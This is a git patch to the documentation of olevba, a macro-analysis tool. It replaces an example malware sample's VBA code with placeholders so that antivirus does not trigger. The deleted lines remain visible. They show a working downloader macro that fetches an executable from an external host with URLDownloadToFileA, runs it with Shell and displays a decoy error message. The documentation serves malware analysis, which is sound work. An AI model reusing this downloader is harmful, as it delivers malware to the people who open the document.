From 41d98ad562d0db71e23f0c669b2776271fde10a0 Mon Sep 17 00:00:00 2001
From: Philippe Lagadec <decalage2@users.noreply.github.com>
Date: Sun, 12 Jul 2015 15:26:57 +0200
Subject: [PATCH] olevba: removed malicious code from documentation to avoid triggering antivirus

---
 oletools/doc/olevba.md | 14 ++------------
 1 file changed, 2 insertions(+), 12 deletions(-)

diff --git a/oletools/doc/olevba.md b/oletools/doc/olevba.md
index a04b12e..9149510 100644
--- a/oletools/doc/olevba.md
+++ b/oletools/doc/olevba.md
@@ -157,20 +157,10 @@ For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/
     SNVJYQ
     End Sub
     Public Sub SNVJYQ()
-        OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.
-    exe"
+        [Malicious Code...]
     End Sub
     Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
-        Dim HRKUYU, lala As Long
-        HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
-        If HRKUYU = 0 Then OGEXYR = True
-        Dim YKPZZS
-        YKPZZS = Shell(PHHWIV, 1)
-        MsgBox "El contenido de este documento no es compatible con este equipo." &
-    vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no
-     compatible"
-        lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi
-    ron("TMP") & "\lkjljlljk", 0, 0)
+        [Malicious Code...]
         Application.DisplayAlerts = False
         Application.Quit
     End Function
--
libgit2 0.21.4